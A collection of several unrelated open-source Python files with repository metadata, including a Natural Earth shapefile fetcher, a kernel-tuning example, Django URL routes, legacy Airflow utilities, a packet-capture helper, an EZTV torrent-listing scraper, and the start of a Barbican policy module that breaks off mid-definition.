natural_earth_v5_0_0 = NaturalEarth_v5_0_0()
def _get_shapefilename_cartopy(resolution, category, name):
try:
import cartopy
except ImportError as e:
msg = (
"``regionmask.defined_regions.natural_earth`` requires cartopy and is "
f"deprecated.\n{ALTERNATIVE} (which do not require cartopy)."
)
raise ImportError(msg) from e
_cartopy_data_dir = cartopy.config["data_dir"]
# check if cartopy has already downloaded the file
cartopy_file = os.path.join(
_cartopy_data_dir,
"shapefiles",
"natural_earth",
f"{category}",
f"ne_{resolution}_{name}.shp",
)
if not os.path.exists(cartopy_file):
raise ValueError(
"``regionmask.defined_regions.natural_earth`` is deprecated. Will not "
f"download new files via this interface. {ALTERNATIVE}."
)
warnings.warn(
f"``regionmask.defined_regions.natural_earth`` is deprecated. {ALTERNATIVE}.",
FutureWarning,
)
return cartopy_file
CACHE_ROOT = pooch.os_cache("regionmask")
@contextmanager
def set_pooch_log_level():
logger = pooch.get_logger()
level = logger.level
logger.setLevel("WARNING")
try:
yield
finally:
logger.setLevel(level)
def _fetch_aws(version, resolution, category, name):
base_url = "https://naturalearth.s3.amazonaws.com"
bname = f"ne_{resolution}_{name}"
fname = f"{bname}.zip"
aws_version = version.replace("v", "")
# the 4.1.0 data is available under 4.1.1
aws_version = aws_version.replace("4.1.0", "4.1.1")
url = f"{base_url}/{aws_version}/{resolution}_{category}/{bname}.zip"
path = CACHE_ROOT / f"natural_earth/{version}"
if Version(pooch.__version__) < Version("1.4"):
# extract_dir not available
unzipper = pooch.Unzip()
else:
unzipper = pooch.Unzip(extract_dir=bname)
with set_pooch_log_level():
fNs = pooch.retrieve(
url,
None,
fname=fname,
path=path,
processor=unzipper,
)
return fNs
|
{
"content_hash": "cbe770a29bc25bab5c0571803854bc80",
"timestamp": "",
"source": "github",
"line_count": 548,
"max_line_length": 86,
"avg_line_length": 26.467153284671532,
"alnum_prop": 0.6008687258687259,
"repo_name": "mathause/regionmask",
"id": "03a1db1c9c931592af6482bbafe87ba57a431e03",
"size": "14504",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "regionmask/defined_regions/_natural_earth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "229900"
}
],
"symlink_target": ""
}
|
"""This is a minimal example for calling Fortran functions"""
from __future__ import print_function
import numpy as np
from kernel_tuner import tune_kernel
def tune():
size = int(80e6)
a = np.random.randn(size).astype(np.float32)
b = np.random.randn(size).astype(np.float32)
c = np.zeros_like(b)
n = np.int32(size)
args = [c, a, b, n]
tune_params = dict()
tune_params["N"] = [size]
tune_params["NTHREADS"] = [16, 8, 4, 2, 1]
print("compile with gfortran")
result, _ = tune_kernel(
"time_vector_add", "vector_add.F90", size,
args, tune_params, lang="C", compiler="gfortran"
)
return result
if __name__ == "__main__":
tune()
|
{
"content_hash": "229a225b728ae66af0bb6f0a4ebda893",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 61,
"avg_line_length": 21.87878787878788,
"alnum_prop": 0.5844875346260388,
"repo_name": "benvanwerkhoven/kernel_tuner",
"id": "ca26ffb90b4afe1fc7b77bc7e7d5eb7ea9e50de8",
"size": "744",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/fortran/vector_add.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Cuda",
"bytes": "3766"
},
{
"name": "Python",
"bytes": "425339"
}
],
"symlink_target": ""
}
|
from django.conf.urls.defaults import *
from django.conf.urls import include
from django.views.generic import DetailView, ListView, TemplateView
from gigs.gig_registry.models import Gig, Band, Venue, Location
from django.contrib.auth.views import logout
urlpatterns = patterns(
'gigs.portal.views',
url(r'^$', TemplateView.as_view(template_name='portal/home.html'), name='home'),
url(r'^about/$', TemplateView.as_view(template_name='portal/about.html'), name='about'),
url(r'^contact/$', TemplateView.as_view(template_name='portal/contact.html'), name='contact'),
url(r'^gig/(?P<pk>\d+)/$', DetailView.as_view(model=Gig, template_name="portal/gig_detail.html"), name='portal_gig_detail'),
url(r'^band/(?P<pk>\d+)/$', DetailView.as_view(model=Band, template_name="portal/band_detail.html"), name='portal_band_detail'),
url(r'^venue/(?P<pk>\d+)/$', DetailView.as_view(model=Venue, template_name="portal/venue_detail.html"), name='portal_venue_detail'),
url(r'^location/(?P<pk>\d+)/$', DetailView.as_view(model=Location, template_name="portal/location_detail.html"), name='portal_location_detail'),
url(r'^tugging/$', TemplateView.as_view(template_name='portal/tugging.html'), name='tugging'),
url(r'^login/$', 'portal_login', name='login'),
url(r'^logout/$', logout, {'next_page':'/'}, name='logout'),
)
|
{
"content_hash": "218391e6f4686ae4e102f87970dae33e",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 148,
"avg_line_length": 71,
"alnum_prop": 0.6938472942920682,
"repo_name": "shaunokeefe/gigs",
"id": "9a669816b50af8368278e3be0eaee5a6b740786a",
"size": "1349",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gigs/portal/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "159979"
},
{
"name": "JavaScript",
"bytes": "438219"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "291480"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
from builtins import str, input, object
from past.builtins import basestring
from copy import copy
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta # for doctest
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import errno
from functools import wraps
import imp
import inspect
import json
import logging
import os
import re
import shutil
import signal
import smtplib
from tempfile import mkdtemp
from alembic.config import Config
from alembic import command
from alembic.migration import MigrationContext
from contextlib import contextmanager
from sqlalchemy import event, exc
from sqlalchemy.pool import Pool
from airflow import settings
from airflow.configuration import conf
class AirflowException(Exception):
pass
class AirflowSensorTimeout(Exception):
pass
class TriggerRule(object):
ALL_SUCCESS = 'all_success'
ALL_FAILED = 'all_failed'
ALL_DONE = 'all_done'
ONE_SUCCESS = 'one_success'
ONE_FAILED = 'one_failed'
DUMMY = 'dummy'
class State(object):
"""
Static class with task instance states constants and color method to
avoid hardcoding.
"""
QUEUED = "queued"
RUNNING = "running"
SUCCESS = "success"
SHUTDOWN = "shutdown" # External request to shut down
FAILED = "failed"
UP_FOR_RETRY = "up_for_retry"
UPSTREAM_FAILED = "upstream_failed"
SKIPPED = "skipped"
state_color = {
QUEUED: 'gray',
RUNNING: 'lime',
SUCCESS: 'green',
SHUTDOWN: 'blue',
FAILED: 'red',
UP_FOR_RETRY: 'gold',
UPSTREAM_FAILED: 'orange',
SKIPPED: 'pink',
}
@classmethod
def color(cls, state):
return cls.state_color[state]
@classmethod
def runnable(cls):
return [
None, cls.FAILED, cls.UP_FOR_RETRY, cls.UPSTREAM_FAILED,
cls.SKIPPED]
def pessimistic_connection_handling():
@event.listens_for(Pool, "checkout")
def ping_connection(dbapi_connection, connection_record, connection_proxy):
'''
Disconnect Handling - Pessimistic, taken from:
http://docs.sqlalchemy.org/en/rel_0_9/core/pooling.html
'''
cursor = dbapi_connection.cursor()
try:
cursor.execute("SELECT 1")
except:
raise exc.DisconnectionError()
cursor.close()
def initdb():
from airflow import models
upgradedb()
# Creating the local_mysql DB connection
C = models.Connection
session = settings.Session()
conn = session.query(C).filter(C.conn_id == 'local_mysql').first()
if not conn:
session.add(
models.Connection(
conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow', password='airflow',
schema='airflow'))
session.commit()
conn = session.query(C).filter(C.conn_id == 'presto_default').first()
if not conn:
session.add(
models.Connection(
conn_id='presto_default', conn_type='presto',
host='localhost',
schema='hive', port=3400))
session.commit()
conn = session.query(C).filter(C.conn_id == 'hive_cli_default').first()
if not conn:
session.add(
models.Connection(
conn_id='hive_cli_default', conn_type='hive_cli',
schema='default',))
session.commit()
conn = session.query(C).filter(C.conn_id == 'hiveserver2_default').first()
if not conn:
session.add(
models.Connection(
conn_id='hiveserver2_default', conn_type='hiveserver2',
host='localhost',
schema='default', port=10000))
session.commit()
conn = session.query(C).filter(C.conn_id == 'metastore_default').first()
if not conn:
session.add(
models.Connection(
conn_id='metastore_default', conn_type='hive_metastore',
host='localhost',
port=10001))
session.commit()
conn = session.query(C).filter(C.conn_id == 'mysql_default').first()
if not conn:
session.add(
models.Connection(
conn_id='mysql_default', conn_type='mysql',
host='localhost'))
session.commit()
conn = session.query(C).filter(C.conn_id == 'sqlite_default').first()
if not conn:
home = conf.get('core', 'AIRFLOW_HOME')
session.add(
models.Connection(
conn_id='sqlite_default', conn_type='sqlite',
host='{}/sqlite_default.db'.format(home)))
session.commit()
conn = session.query(C).filter(C.conn_id == 'http_default').first()
if not conn:
home = conf.get('core', 'AIRFLOW_HOME')
session.add(
models.Connection(
conn_id='http_default', conn_type='http',
host='http://www.google.com'))
session.commit()
conn = session.query(C).filter(C.conn_id == 'mssql_default').first()
if not conn:
session.add(
models.Connection(
conn_id='mssql_default', conn_type='mssql',
host='localhost', port=1433))
session.commit()
conn = session.query(C).filter(C.conn_id == 'vertica_default').first()
if not conn:
session.add(
models.Connection(
conn_id='vertica_default', conn_type='vertica',
host='localhost', port=5433))
session.commit()
# Known event types
KET = models.KnownEventType
if not session.query(KET).filter(KET.know_event_type == 'Holiday').first():
session.add(KET(know_event_type='Holiday'))
if not session.query(KET).filter(KET.know_event_type == 'Outage').first():
session.add(KET(know_event_type='Outage'))
if not session.query(KET).filter(
KET.know_event_type == 'Natural Disaster').first():
session.add(KET(know_event_type='Natural Disaster'))
if not session.query(KET).filter(
KET.know_event_type == 'Marketing Campaign').first():
session.add(KET(know_event_type='Marketing Campaign'))
session.commit()
session.close()
models.DagBag(sync_to_db=True)
def upgradedb():
logging.info("Creating tables")
package_dir = os.path.abspath(os.path.dirname(__file__))
directory = os.path.join(package_dir, 'migrations')
config = Config(os.path.join(package_dir, 'alembic.ini'))
config.set_main_option('script_location', directory)
config.set_main_option('sqlalchemy.url',
conf.get('core', 'SQL_ALCHEMY_CONN'))
command.upgrade(config, 'head')
def resetdb():
'''
Clear out the database
'''
from airflow import models
logging.info("Dropping tables that exist")
models.Base.metadata.drop_all(settings.engine)
mc = MigrationContext.configure(settings.engine)
if mc._version.exists(settings.engine):
mc._version.drop(settings.engine)
initdb()
def validate_key(k, max_length=250):
if not isinstance(k, basestring):
raise TypeError("The key has to be a string")
elif len(k) > max_length:
raise AirflowException(
"The key has to be less than {0} characters".format(max_length))
elif not re.match(r'^[A-Za-z0-9_\-\.]+$', k):
raise AirflowException(
"The key ({k}) has to be made of alphanumeric characters, dashes, "
"dots and underscores exclusively".format(**locals()))
else:
return True
def date_range(start_date, end_date=datetime.now(), delta=timedelta(1)):
l = []
if end_date >= start_date:
while start_date <= end_date:
l.append(start_date)
start_date += delta
else:
raise AirflowException("start_date can't be after end_date")
return l
def json_ser(obj):
"""
json serializer that deals with dates
usage: json.dumps(object, default=utils.json_ser)
"""
if isinstance(obj, datetime):
obj = obj.isoformat()
return obj
def alchemy_to_dict(obj):
"""
Transforms a SQLAlchemy model instance into a dictionary
"""
if not obj:
return None
d = {}
for c in obj.__table__.columns:
value = getattr(obj, c.name)
if type(value) == datetime:
value = value.isoformat()
d[c.name] = value
return d
def readfile(filepath):
f = open(filepath)
content = f.read()
f.close()
return content
def provide_session(func):
"""
Function decorator that provides a session if it isn't provided.
If you want to reuse a session or run the function as part of a
database transaction, you pass it to the function, if not this wrapper
will create one and close it for you.
"""
@wraps(func)
def wrapper(*args, **kwargs):
needs_session = False
if 'session' not in kwargs:
needs_session = True
session = settings.Session()
kwargs['session'] = session
result = func(*args, **kwargs)
if needs_session:
session.expunge_all()
session.commit()
session.close()
return result
return wrapper
def apply_defaults(func):
"""
Function decorator that Looks for an argument named "default_args", and
fills the unspecified arguments from it.
Since python2.* isn't clear about which arguments are missing when
calling a function, and that this can be quite confusing with multi-level
inheritance and argument defaults, this decorator also alerts with
specific information about the missing arguments.
"""
@wraps(func)
def wrapper(*args, **kwargs):
if len(args) > 1:
raise AirflowException(
"Use keyword arguments when initializing operators")
dag_args = {}
dag_params = {}
if 'dag' in kwargs and kwargs['dag']:
dag = kwargs['dag']
dag_args = copy(dag.default_args) or {}
dag_params = copy(dag.params) or {}
params = {}
if 'params' in kwargs:
params = kwargs['params']
dag_params.update(params)
default_args = {}
if 'default_args' in kwargs:
default_args = kwargs['default_args']
if 'params' in default_args:
dag_params.update(default_args['params'])
del default_args['params']
dag_args.update(default_args)
default_args = dag_args
arg_spec = inspect.getargspec(func)
num_defaults = len(arg_spec.defaults) if arg_spec.defaults else 0
non_optional_args = arg_spec.args[:-num_defaults]
if 'self' in non_optional_args:
non_optional_args.remove('self')
for arg in func.__code__.co_varnames:
if arg in default_args and arg not in kwargs:
kwargs[arg] = default_args[arg]
missing_args = list(set(non_optional_args) - set(kwargs))
if missing_args:
msg = "Argument {0} is required".format(missing_args)
raise AirflowException(msg)
kwargs['params'] = dag_params
result = func(*args, **kwargs)
return result
return wrapper
def ask_yesno(question):
yes = set(['yes', 'y'])
no = set(['no', 'n'])
done = False
print(question)
while not done:
choice = input().lower()
if choice in yes:
return True
elif choice in no:
return False
else:
print("Please respond by yes or no.")
def send_email(to, subject, html_content, files=None):
SMTP_MAIL_FROM = conf.get('smtp', 'SMTP_MAIL_FROM')
if isinstance(to, basestring):
if ',' in to:
to = to.split(',')
elif ';' in to:
to = to.split(';')
else:
to = [to]
msg = MIMEMultipart('alternative')
msg['Subject'] = subject
msg['From'] = SMTP_MAIL_FROM
msg['To'] = ", ".join(to)
mime_text = MIMEText(html_content, 'html')
msg.attach(mime_text)
for fname in files or []:
basename = os.path.basename(fname)
with open(fname, "rb") as f:
msg.attach(MIMEApplication(
f.read(),
Content_Disposition='attachment; filename="%s"' % basename,
Name=basename
))
send_MIME_email(SMTP_MAIL_FROM, to, msg)
def send_MIME_email(e_from, e_to, mime_msg):
SMTP_HOST = conf.get('smtp', 'SMTP_HOST')
SMTP_PORT = conf.getint('smtp', 'SMTP_PORT')
SMTP_USER = conf.get('smtp', 'SMTP_USER')
SMTP_PASSWORD = conf.get('smtp', 'SMTP_PASSWORD')
SMTP_STARTTLS = conf.getboolean('smtp', 'SMTP_STARTTLS')
s = smtplib.SMTP(SMTP_HOST, SMTP_PORT)
if SMTP_STARTTLS:
s.starttls()
if SMTP_USER and SMTP_PASSWORD:
s.login(SMTP_USER, SMTP_PASSWORD)
logging.info("Sent an alert email to " + str(e_to))
s.sendmail(e_from, e_to, mime_msg.as_string())
s.quit()
def import_module_attrs(parent_module_globals, module_attrs_dict):
'''
Attempts to import a set of modules and specified attributes in the
form of a dictionary. The attributes are copied in the parent module's
namespace. The function returns a list of attributes names that can be
affected to __all__.
This is used in the context of ``operators`` and ``hooks`` and
silence the import errors for when libraries are missing. It makes
for a clean package abstracting the underlying modules and only
brings functional operators to those namespaces.
'''
imported_attrs = []
for mod, attrs in list(module_attrs_dict.items()):
try:
folder = os.path.dirname(parent_module_globals['__file__'])
f, filename, description = imp.find_module(mod, [folder])
module = imp.load_module(mod, f, filename, description)
for attr in attrs:
parent_module_globals[attr] = getattr(module, attr)
imported_attrs += [attr]
except:
logging.debug("Couldn't import module " + mod)
return imported_attrs
def is_in(obj, l):
"""
Checks whether an object is one of the item in the list.
This is different from ``in`` because ``in`` uses __cmp__ when
present. Here we change based on the object itself
"""
for item in l:
if item is obj:
return True
return False
@contextmanager
def TemporaryDirectory(suffix='', prefix=None, dir=None):
name = mkdtemp(suffix=suffix, prefix=prefix, dir=dir)
try:
yield name
finally:
try:
shutil.rmtree(name)
except OSError as e:
# ENOENT - no such file or directory
if e.errno != errno.ENOENT:
raise e
class AirflowTaskTimeout(Exception):
pass
class timeout(object):
"""
To be used in a ``with`` block and timeout its content.
"""
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum, frame):
logging.error("Process timed out")
raise AirflowTaskTimeout(self.error_message)
def __enter__(self):
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
signal.alarm(0)
def is_container(obj):
"""
Test if an object is a container (iterable) but not a string
"""
return hasattr(obj, '__iter__') and not isinstance(obj, basestring)
def as_tuple(obj):
"""
If obj is a container, returns obj as a tuple.
Otherwise, returns a tuple containing obj.
"""
if is_container(obj):
return tuple(obj)
else:
return tuple([obj])
def round_time(dt, delta, start_date=datetime.min):
"""
Returns the datetime of the form start_date + i * delta
which is closest to dt for any non-negative integer i.
Note that delta may be a datetime.timedelta or a dateutil.relativedelta
>>> round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
datetime.datetime(2015, 1, 1, 0, 0)
>>> round_time(datetime(2015, 1, 2), relativedelta(months=1))
datetime.datetime(2015, 1, 1, 0, 0)
>>> round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
datetime.datetime(2015, 9, 16, 0, 0)
>>> round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
datetime.datetime(2015, 9, 15, 0, 0)
>>> round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
datetime.datetime(2015, 9, 14, 0, 0)
>>> round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
datetime.datetime(2015, 9, 14, 0, 0)
"""
# Ignore the microseconds of dt
dt -= timedelta(microseconds = dt.microsecond)
# We are looking for a datetime in the form start_date + i * delta
# which is as close as possible to dt. Since delta could be a relative
# delta we don't know it's exact length in seconds so we cannot rely on
# division to find i. Instead we employ a binary search algorithm, first
# finding an upper and lower limit and then disecting the interval until
# we have found the closest match.
# We first search an upper limit for i for which start_date + upper * delta
# exceeds dt.
upper = 1
while start_date + upper*delta < dt:
# To speed up finding an upper limit we grow this exponentially by a
# factor of 2
upper *= 2
# Since upper is the first value for which start_date + upper * delta
# exceeds dt, upper // 2 is below dt and therefore forms a lower limited
# for the i we are looking for
lower = upper // 2
# We now continue to intersect the interval between
# start_date + lower * delta and start_date + upper * delta
# until we find the closest value
while True:
# Invariant: start + lower * delta < dt <= start + upper * delta
# If start_date + (lower + 1)*delta exceeds dt, then either lower or
# lower+1 has to be the solution we are searching for
if start_date + (lower + 1)*delta >= dt:
# Check if start_date + (lower + 1)*delta or
# start_date + lower*delta is closer to dt and return the solution
if (start_date + (lower + 1)*delta) - dt <= dt - (start_date + lower*delta):
return start_date + (lower + 1)*delta
else:
return start_date + lower*delta
# We intersect the interval and either replace the lower or upper
# limit with the candidate
candidate = lower + (upper - lower) // 2
if start_date + candidate*delta >= dt:
upper = candidate
else:
lower = candidate
# in the special case when start_date > dt the search for upper will
# immediately stop for upper == 1 which results in lower = upper // 2 = 0
# and this function returns start_date.
def chain(*tasks):
"""
Given a number of tasks, builds a dependency chain.
chain(task_1, task_2, task_3, task_4)
is equivalent to
task_1.set_downstream(task_2)
task_2.set_downstream(task_3)
task_3.set_downstream(task_4)
"""
for up_task, down_task in zip(tasks[:-1], tasks[1:]):
up_task.set_downstream(down_task)
class AirflowJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return obj.strftime('%Y-%m-%dT%H:%M:%SZ')
elif isinstance(obj, date):
return obj.strftime('%Y-%m-%d')
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, obj)
|
{
"content_hash": "24bfeafa3fb89cf5f7c184765b4f2aec",
"timestamp": "",
"source": "github",
"line_count": 627,
"max_line_length": 90,
"avg_line_length": 31.913875598086126,
"alnum_prop": 0.6063468265867067,
"repo_name": "cswaroop/airflow",
"id": "f07ce5f53c16f7326f871592d44511ab8f67a573",
"size": "20010",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "airflow/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "36075"
},
{
"name": "HTML",
"bytes": "89787"
},
{
"name": "JavaScript",
"bytes": "895747"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "492522"
},
{
"name": "Shell",
"bytes": "967"
}
],
"symlink_target": ""
}
|
import time
import tempfile
import os
from pyWire.packet.packet import Packet
from pyWire.capture.file_capture import FileCapture
from pyWire.capture.fileformats.PcapFile import PcapFile
from pyWire.capture.callbacks import Callback
class LinkTypes(object):
NULL = 0
ETHERNET = 1
IEEE802_5 = 6
PPP = 9
IEEE802_11 = 105
class InMemCapture(FileCapture):
""""
A class representing a capture read from memory - list of packets.
It does use temporary file though.
"""
def __init__(self, packet_list, display_filter=None,
decryption_key=None, encryption_type='wpa-pwk'):
"""
Creates a new in-mem capture, a capture capable of receiving binary packets and parsing them using tshark.
Currently opens a new instance of tshark for every packet buffer,
so it is very slow -- try inserting more than one packet at a time if possible.
:param packet_list: The packets list. May contain packet objects or raw bytes of packets as strings.
:param display_filter: Display (wireshark) filter to use.
:param decryption_key: Key used to encrypt and decrypt captured traffic.
:param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD',
or 'WPA-PWK'. Defaults to WPA-PWK).
"""
theTmpFile = tempfile.NamedTemporaryFile(prefix = 'pyWire_InMem_tmp_')
self.tmpFileName = theTmpFile.name
del(theTmpFile)
thePcapFile = PcapFile(self.tmpFileName)
for i , pkt in enumerate(packet_list):
if type(pkt) == Packet:
thePcapFile.WritePacket(pkt)
elif type(pkt) == str:
curTime = time.time()
thePcapFile._WritePacket(pkt , int(curTime) , curTime-int(curTime))
else:
print 'Warning, skipping %d packet - unknown format' % i
thePcapFile.Close()
super(InMemCapture, self).__init__( input_file = self.tmpFileName , display_filter=display_filter,
decryption_key=decryption_key, encryption_type=encryption_type)
def __del__(self):
os.remove(self.tmpFileName)
def InMemFilterPackets(pktList , display_filter):
'''
Filter the given packet list using the given display filter.
Return a new list with the filtered packets.
'''
cap = InMemCapture(pktList , display_filter)
newList = []
cap.apply_on_packets(Callback.CB_AddPacketToList , args = newList)
del(cap)
return newList
|
{
"content_hash": "ef72c6f35a3a0ad31455148e3111582b",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 114,
"avg_line_length": 41.142857142857146,
"alnum_prop": 0.6477623456790124,
"repo_name": "SnifferMaster/pyWire",
"id": "5855a70f2d3509b2ae215ace3bb87a3b59a2271c",
"size": "2592",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyWire/capture/inmem_capture.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "61433"
}
],
"symlink_target": ""
}
|
"""
Python interface for EZTV.
Works by screen-scraping the homepage and show pages, but depending as little
on the names of elements or structure of the DOM as possible.
"""
__version__ = "3.0.1"
import bs4
import re
import collections
import urlparse
import urllib
import urllib2
SCHEME = 'https'
HEADERS = {
'User-Agent': 'Mozilla/5.0 (X11; Linux i686) '
'AppleWebKit/537.36 (KHTML, like Gecko) '
'Ubuntu Chromium/30.0.1599.114 '
'Chrome/30.0.1599.114 Safari/537.36'
}
EZTV_DOMAIN = 'eztv.ag'
class EztvIt(object):
"""EZTV.it Client
Example usage:
import eztvit
eztvit.EztvIt().get_episodes('Suits')
"""
def __init__(self):
self.shows_list = None
def _get_episodes_page_html(self, show_id):
"""Fetch the shows page.
This simulates selecting a show from the homepage dropdown, and click
on the "Search" button.
"""
request = urllib2.Request(
url=SCHEME + '://' + EZTV_DOMAIN + '/shows/{show_id}/'.format(show_id= show_id),
headers=HEADERS
)
return urllib2.urlopen(request).read()
def _get_homepage_html(self):
"""Fetch the homepage."""
request = urllib2.Request(url=SCHEME + '://' + EZTV_DOMAIN + '/', headers=HEADERS)
return urllib2.urlopen(request).read()
def get_shows(self):
"""Get the list of shows on offer.
Returns a dict, with the show ID as the key, and the show name as the
value. All show names are normalized, for example if a show ends in
"The, ", it's placed at the start.
For performance, the shows are cached in memory so subsequent calls
are fast.
"""
# Check the cache.
if self.shows_list is not None:
return self.shows_list
parsed = bs4.BeautifulSoup(self._get_homepage_html())
shows_select = parsed.find('select', attrs={'name': 'SearchString'})
if not shows_select:
raise RuntimeError("Cannot find dropdown called SearchString"
" with the shows in on the homepage.")
# The shows that we have parsed.
self.shows_list = {}
shows_options = shows_select.find_all('option')
for option in shows_options:
original_name = option.string
try:
show_id = int(option['value'])
except ValueError:
# Skip this show and move on to the next one.
continue
# EZTV have a neat trick where they place the "The " of a show at
# the end of the string. So "The Big Bang Theory" will become "Big
# Bang Theory, The". We put it at the beginning in order to
# normalize it to make it more intuitive to lookup against.
if original_name[-5:] == ", The":
normalized_name = "The " + original_name[0:-5]
else:
normalized_name = original_name
self.shows_list[show_id] = normalized_name
return self.shows_list
def get_episodes(self, show_name):
"""Get the episodes for a show by name.
This has an additional overhead of having to request the homepage.
Where possible, you should retrieve the show ID yourself and save it,
then call get_episodes_by_id directly to remove the overhead.
"""
shows = self.get_shows()
if show_name not in shows.values():
raise KeyError("Show not found")
(show_id, ) = [k for k, v in shows.iteritems() if v == show_name]
return self.get_episodes_by_id(show_id)
def get_episodes_by_id(self, show_id):
"""Get the episodes for a show based on its ID."""
parsed = bs4.BeautifulSoup(self._get_episodes_page_html(show_id))
# First, we need to locate the table that contains the "Television
# Show Releases".
tv_releases_title = parsed.find(
text=lambda t: t.strip().endswith('- Torrents Download'))
if not tv_releases_title:
raise RuntimeError("Unable to locate the table that contains the "
"list of releases")
# Different release authors choose different formats, so we try to
# cater for them all.
episode_codes = [
r'S(\d{1,2})E(\d{1,2})', # e.g. S02E16
r'(\d{1,2})x(\d{1,2})', # e.g. 2x02
]
# We build the general regex by ensuring any if the release formats
# that match, must do with surrounding whitespace. This gives the
# maximum chance that we're matching the episode code and not some
# other part of the title.
episode_code_regex = re.compile(r'\s' + '|'.join(episode_codes) + r'\s')
# We build a structure of the form shows[season][episode] = [matching
# links] (since one episode may have multiple releases by different
# authors or different quality).
shows = collections.defaultdict(lambda: collections.defaultdict(list))
# Attempt to locate all of the hyperlinks within the shows table that
# contain, what appear to be, episode codes. The object here is not to
# tightly couple ourself to EZTVs DOM (i.e. not specifically look for
# an anchor within a td). This enables them to reasonably refactor the
# page, provided the end result is still a <table> (which it should
# be, since this is tabular data, after all) and we'll stil have no
# real issues matching episode information.
release_anchors = parsed.find_all('a', text=episode_code_regex)
for anchor in release_anchors:
# The anchor itself will be contained by a <tr> (i.e. the whole
# row of the table). This ensures we're look at precisely one
# episode (row) at a time.
row = anchor.find_parent('tr')
if not row:
raise RuntimeError("The episode anchor was not contained "
"inside a <tr>")
# Matching download links.
links = {}
# A magnet link is simply a link that has "magnet" as the protocol
# (i.e. it begins with "magnet:").
magnet_link = row.find(href=re.compile(r'^magnet:'))
if magnet_link:
links['magnet'] = magnet_link.get('href')
# We consider a link to point to a torrent if it ends in
# ".torrent". Note, this isn't foolproof - i.e.
# "http://www.google.com/?.torrent" would trick this into
# matching.
torrent_links = row.find_all(href=re.compile(r'\.torrent$'))
if torrent_links:
# Scheme-relative links are pretty useless in the output, so
# we substitute any missing schemes for the way we accessed
# this page in the first place (e.g. if we accessed it over
# https, we use https as the default).
hrefs = (torrent_link.get('href') for torrent_link in torrent_links)
links['torrents'] = [urlparse.urlparse(href, SCHEME).geturl() for href in hrefs]
# Find the anchor that looks like it has a title for the filesize.
filesize_regex = re.compile(r'([\d\.]+) (MB|GB|B)')
filesize_anchor = row.find(title=filesize_regex)
# Get the size and the units
filesize_match = filesize_regex.search(filesize_anchor.get('title'))
assert filesize_match, "Extract the filesize from the title"
# Parse the human MB/GB into a universal megabytes format.
factors = {'GB': 1024, 'MB': 1, 'B': 0}
filesize_units = filesize_match.group(2)
assert filesize_units in factors
# Convert it to a reasonably-readable megabyte-size.
filesize_mb = int(
float(filesize_match.group(1)) * factors[filesize_units])
season = None
episode = None
for release_format in episode_codes:
release_match = re.search(release_format, anchor.text)
if release_match:
season = int(release_match.group(1))
episode = int(release_match.group(2))
assert season is not None, "Find the season number"
assert episode is not None, "Find the episode number"
shows[season][episode].append({
'release': anchor.text,
'download': links,
'size_mb': filesize_mb,
})
# Return a dict, not a defaultdict.
return dict(
dict((season, dict(episodes)) for
(season, episodes) in shows.iteritems())
)
|
{
"content_hash": "a8d348d601c974fb4654e0fcd3916c77",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 96,
"avg_line_length": 39.681614349775785,
"alnum_prop": 0.5816476438015595,
"repo_name": "henryforever14/eztvit-python",
"id": "16608e8a2a29580bc52ef60a451b685c0eac186f",
"size": "8871",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "eztvit/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "18568"
}
],
"symlink_target": ""
}
|
from oslo_log import versionutils
from oslo_policy import policy
from barbican.common.policies import base
deprecated_orders_get = policy.DeprecatedRule(
name='orders:get',
check_str='rule:all_but_audit',
deprecated_reason=base.LEGACY_POLICY_DEPRECATION,
deprecated_since=versionutils.deprecated.WALLABY
)
deprecated_orders_post = policy.DeprecatedRule(
name='orders:post',
check_str='rule:admin_or_creator',
deprecated_reason=base.LEGACY_POLICY_DEPRECATION,
deprecated_since=versionutils.deprecated.WALLABY
)
deprecated_orders_put = policy.DeprecatedRule(
name='orders:put',
check_str='rule:admin_or_creator',
deprecated_reason=base.LEGACY_POLICY_DEPRECATION,
deprecated_since=versionutils.deprecated.WALLABY
)
deprecated_order_get = policy.DeprecatedRule(
name='order:get',
check_str='rule:all_users and project_id:%(target.order.project_id)s',
deprecated_reason=base.LEGACY_POLICY_DEPRECATION,
deprecated_since=versionutils.deprecated.WALLABY
)
deprecated_order_delete = policy.DeprecatedRule(
name='order:delete',
